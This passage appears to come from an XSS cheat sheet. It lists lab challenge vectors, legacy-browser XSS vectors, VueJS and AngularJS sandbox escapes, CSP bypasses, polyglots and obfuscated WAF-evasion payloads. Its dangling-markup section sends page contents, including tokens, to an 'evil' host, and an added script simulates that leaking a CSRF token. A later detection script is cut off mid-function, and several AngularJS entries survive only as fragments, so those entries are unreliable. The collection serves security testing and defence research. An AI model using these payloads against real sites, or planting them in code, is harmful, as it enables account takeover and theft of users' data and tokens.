Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q oncut=alert``>, but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q/oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside single quoted string, only characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
Classic vectors (XSS crypt)
Image src with JavaScript protocol: <img src="javascript:alert(1)">
Body background with JavaScript protocol: <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE: <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup: <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs (percent-encoded XML bindings document; the percent signs were lost in extraction): <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,3C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E)">
CSS expressions <=IE7: <div style="xss:expression(alert(1))"> <div style="xss:expression(1)-alert(1)"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio\006e(alert(1))"> <div style="xss:expressio\00006e(alert(1))"> <div style="xss:expressio\6e(alert(1))"> <div style="xss:expressio&#x5c;6e(alert(1))">
In quirks mode IE allowed you to use = instead of : <div style="xss=expression(alert(1))"> <div style="color&#x3dred">test</div>
Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions:
<script> function window.onload(){ alert(1) } </script>
<script> function window::onload(){ alert(1) } </script>
<script> function window.location(){} </script>
<body><script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script></body>
<body><script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>" } </script></body>
GreyMagic HTML+time exploit (no longer works even in 5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & (the NULL byte is not visible in the extracted text): <a href="javascript&#x6aavascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities (the NULL byte is not visible in the extracted text): <a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments (the NULL bytes are not visible in the extracted text): <!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>
Isindex using src attribute: <isindex type=image src="//evil?
Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction: <isindex type=submit formaction=javascript:alert(1)>
Isindex and action: <isindex type=submit action=javascript:alert(1)>
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
SVG script with unicode escapes and HTML encoding: <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
The character references decode to \u0061\u006c\u0065\u0072\u0074(1), which the JavaScript parser reads as alert(1), because identifiers may contain \u escapes. The entities are decoded at all only because the <script> sits inside <svg>: the HTML parser treats it as foreign content rather than raw script data, so references are resolved before the script runs.
Client-side template injection

VueJS, reflected

Each entry gives the affected versions, the author, the vector length in characters, and the vector.

All versions (Mario Heiderich, Cure53; 41 chars): {{constructor.constructor('alert(1)')()}}
All versions (Mario Heiderich, Cure53 & Sebastian Lekies, Eduardo Vela Nava, Krzysztof Kotowicz, Google; 62 chars): <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions (Gareth Heyes, PortSwigger; 39 chars): <x v-html=_c.constructor('alert(1)')()>
All versions (Peter af Geijerstam, Swedish Shellcode Factory; 37 chars): <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes, reflected

Each entry gives the affected versions, the author, the vector length in characters, and the vector.

1.0.1 - 1.1.5 (Mario Heiderich, Cure53; 41 chars): {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5, shorter (Gareth Heyes, PortSwigger & Lewis Ardern, Synopsys; 33 chars): {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 (Jan Horn, Google; 122 chars): {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 (Gareth Heyes, PortSwigger; 23 chars): )))alert(1) (only this fragment of the vector survives in this copy)
1.2.6 - 1.2.18 (Jan Horn, Google; 106 chars): {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 (Mathias Karlsson, Detectify; 124 chars): {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 (Gareth Heyes, PortSwigger; 23 chars): )))alert(1) (only this fragment of the vector survives in this copy)
1.2.27 - 1.2.29 and 1.3.0 - 1.3.20 (Gareth Heyes, PortSwigger; 23 chars): )))alert(1) (only this fragment of the vector survives in this copy)
1.3.0 (Gábor Molnár, Google; 272 chars): {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
1.3.3 - 1.3.18 (Gareth Heyes, PortSwigger; 128 chars): {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 (Gareth Heyes, PortSwigger; 102 chars): {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 (Gareth Heyes, PortSwigger; 65 chars): {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 (Gareth Heyes, PortSwigger; 74 chars): {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 (Ian Hickey & Gareth Heyes, PortSwigger; 79 chars): {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 (Jan Horn, Google; 517 chars): {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0 (Mario Heiderich, Cure53; 41 chars): {{constructor.constructor('alert(1)')()}}
>=1.6.0, shorter (Gareth Heyes, PortSwigger & Lewis Ardern, Synopsys; 33 chars): {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy, or no $eval)

Each entry gives the affected versions, the author, the vector length in characters, and the vector.

1.0.1 - 1.1.5 (Mario Heiderich, Cure53; 37 chars): constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 (Jan Horn, Google; 118 chars): a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 (Mathias Karlsson, Detectify; 119 chars): toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 (Gareth Heyes, PortSwigger; 317 chars): {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29 and 1.3.0 - 1.3.20 (Gareth Heyes, PortSwigger; 20 chars): )))alert(1) (only this fragment of the vector survives in this copy)
1.4.0 - 1.4.5 (Gareth Heyes, PortSwigger; 75 chars): 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 (Mario Heiderich, Cure53; 37 chars): constructor.constructor('alert(1)')()
1.4.4, without strings (Gareth Heyes, PortSwigger; 134 chars): toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses

Each entry gives the affected versions, the author, the vector length in characters, and the vector.

All versions, Chrome (Gareth Heyes, PortSwigger; 81 chars): <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions, Chrome, shorter (Gareth Heyes, PortSwigger; 56 chars): <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions, all browsers, shorter (Gareth Heyes, PortSwigger; 91 chars): <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 (Eduardo Vela, Google; 190 chars): <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions, Chrome, shorter via oncut (Savan Gadhiya, NotSoSecure; 49 chars): <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>

The $event.path entries depend on the non-standard Event.path property, which Chrome removed in version 109; $event.composedPath() is the standard equivalent and is why the "all browsers" entry works everywhere.
Scriptless attacks

Dangling markup

Background attribute: <body background="//evil? <table background="//evil? <table><thead background="//evil? <table><tbody background="//evil? <table><tfoot background="//evil? <table><td background="//evil? <table><th background="//evil?
Link href stylesheet: <link rel=stylesheet href="//evil?
Link href icon: <link rel=icon href="//evil?
Meta refresh: <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute: <img src="//evil? <image src="//evil?
Video using track element: <video><track default src="//evil?
Video using source element and src attribute: <video><source src="//evil?
Audio using source element and src attribute: <audio><source src="//evil?
Input src: <input type=image src="//evil?
Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action: <button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data: <object data="//evil?
Iframe src: <iframe src="//evil?
Embed src: <embed src="//evil?
Use textarea to consume markup and post to an external site: <form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page: <embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page: <iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page: <object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page: <frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?
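What the dangling markup vectors above actually make the browser do is easiest to see by modelling the tokenizer step that matters. The script below is an added example, not code from the cheat sheet: the page template, the CSRF token value and the //evil host in it are constructed for the demo. It reflects a vector into the page and reports the URL the injected element will request and the slice of the page's own markup that rides along in it.

```javascript
// Added example, not from the cheat sheet. It models what the dangling markup
// vectors above make a browser do: the injected tag opens a quoted attribute
// and never closes it, so the HTML tokenizer keeps consuming the page's own
// markup as the attribute value until it meets the next matching quote, and the
// element then requests a URL that carries that markup. The page template and
// the //evil host are constructed for the demo.

// The tokenizer's "attribute value (quoted) state": the value runs from just
// after the opening quote to the next identical quote character (or the end of
// input). Character references are ignored here for simplicity.
function danglingAttributeValue(html, openQuoteIndex) {
  const quote = html[openQuoteIndex];
  const close = html.indexOf(quote, openQuoteIndex + 1);
  return html.slice(openQuoteIndex + 1, close === -1 ? html.length : close);
}

// Reflect the vector into the page and work out what the browser will fetch.
// `vector` must end with an unterminated quoted attribute such as src="//evil?
function simulateDanglingMarkup(template, vector) {
  const page = template.replace('{{INPUT}}', vector);
  const start = page.indexOf(vector);
  const quoteInVector = Math.max(vector.lastIndexOf('"'), vector.lastIndexOf("'"));
  const value = danglingAttributeValue(page, start + quoteInVector);
  const urlPrefix = vector.slice(quoteInVector + 1);   // e.g. //evil?
  return {
    requestUrl: value,                                  // raw; the browser percent-encodes it
    leaked: value.slice(urlPrefix.length),              // the page markup appended to the URL
  };
}

// A constructed page: the reflection point precedes a form with a CSRF token.
// All of its attributes use double quotes and none use single quotes.
const constructedPage = [
  '<html><body>',
  '<p>Search results for: {{INPUT}}</p>',
  '<form action="/transfer" method="post">',
  '<input type="hidden" name="csrf" value="c0ffee-constructed-token">',
  '<input type="text" name="amount">',
  '</form></body></html>',
].join('\n');

// Quote choice decides how much leaks: a double-quoted vector is cut off at the
// first double quote in the page (here action="), while a single-quoted one
// runs to the end of the document because the page never uses a single quote.
function leakComparison(page) {
  return {
    doubleQuoted: simulateDanglingMarkup(page, '<img src="//evil?'),
    singleQuoted: simulateDanglingMarkup(page, "<img src='//evil?"),
  };
}

console.log(leakComparison(constructedPage));
```

Two practical points follow from the model. First, pick the quote character the target page does not use after the injection point, or the leak is truncated before anything interesting. Second, Chrome has refused since version 66 to load resource URLs that contain both a newline and a < character, which a leak like the one above almost always does; that mitigation is one reason the table also lists the window.name, base href and form-based variants, whose payload never goes into a resource URL.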
Polyglots

Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects

XSS into a JavaScript string, string concatenation (window): window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self): self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this): this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top): top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent): parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames): frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis): globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window): window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self): self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this): this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top): top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent): parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames): frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis): globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window): window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self): self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this): this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top): top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent): parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames): frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis): globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window): window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self): self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this): this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top): top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent): parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames): frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis): globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window): window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self): self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this): this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top): top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent): parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames): frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis): globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window): window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self): self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this): this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top): top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent): parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames): frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis): globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window): window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self): self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this): this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top): top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent): parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames): frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis): globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window): window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self): self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this): this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top): top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent): parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames): frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis): globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
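Every vector in the table above resolves to the same property lookup, window['alert'], yet none of them contains the text a signature for window.alert or window['alert'] is looking for. The script below is an added example, not code from the cheat sheet: it normalises the bracket key of each form (concatenation, comments, hex, octal and unicode escapes, RegExp .source) back to the plain name a defender should match on, spells out how the JSFuck key is built from coercions, and also runs the two decoding layers behind the SVG <script> entity vector earlier on the page. The vectors, the naive rule and the WAF view of the request are all constructed for the demo.

```javascript
// Added example, not from the cheat sheet. The "global object" vectors above
// never contain the literal text a naive WAF rule looks for; the JavaScript
// engine only sees "alert" after it evaluates the bracket expression. This
// normaliser performs the same decoding a defender needs before matching.
// The SVG <script> vector earlier on the page stacks a second layer on top:
// HTML character references that decode to \u escapes inside an identifier.
// Every vector and rule string here is constructed for the demo.

// Decode the escapes JavaScript permits inside a string literal: \xHH,
// \uHHHH, \u{H..H}, legacy octal \NNN and the single-character escapes.
// Identifiers only permit the \u forms, so the same function covers both.
function decodeJsEscapes(text) {
  return text.replace(
    /\\(x[0-9a-fA-F]{2}|u\{[0-9a-fA-F]+\}|u[0-9a-fA-F]{4}|[0-7]{1,3}|[\s\S])/g,
    (_, esc) => {
      if (esc[0] === 'x') return String.fromCharCode(parseInt(esc.slice(1), 16));
      if (esc[0] === 'u') {
        const hex = esc[1] === '{' ? esc.slice(2, -1) : esc.slice(1);
        return String.fromCodePoint(parseInt(hex, 16));
      }
      if (/^[0-7]+$/.test(esc)) return String.fromCharCode(parseInt(esc, 8));
      const simple = { n: '\n', r: '\r', t: '\t', b: '\b', f: '\f', v: '\v' };
      return Object.prototype.hasOwnProperty.call(simple, esc) ? simple[esc] : esc;
    });
}

// Decode numeric HTML character references (&#x5c; &#117; ...). The HTML parser
// resolves these before the script engine runs; inside <svg> that applies to
// <script> content too, because it is parsed as foreign content.
function decodeNumericEntities(html) {
  return html.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);/g, (_, num) =>
    String.fromCodePoint(/^[xX]/.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10)));
}

// Normalise one bracket-key expression from the table, such as
//   'ale'+'rt'   /*foo*/'alert'/*bar*/   '\x61\x6c\x65\x72\x74'   /al/.source+/ert/.source
// into the property name the engine will look up. Returns null for forms built
// from anything other than string literals and RegExp .source (e.g. JSFuck).
// Splitting on '+' is adequate for these vectors; a literal containing '+'
// would need a real tokenizer.
function normaliseKeyExpression(expr) {
  const parts = expr.replace(/\/\*[\s\S]*?\*\//g, '').split('+');
  let name = '';
  for (const raw of parts) {
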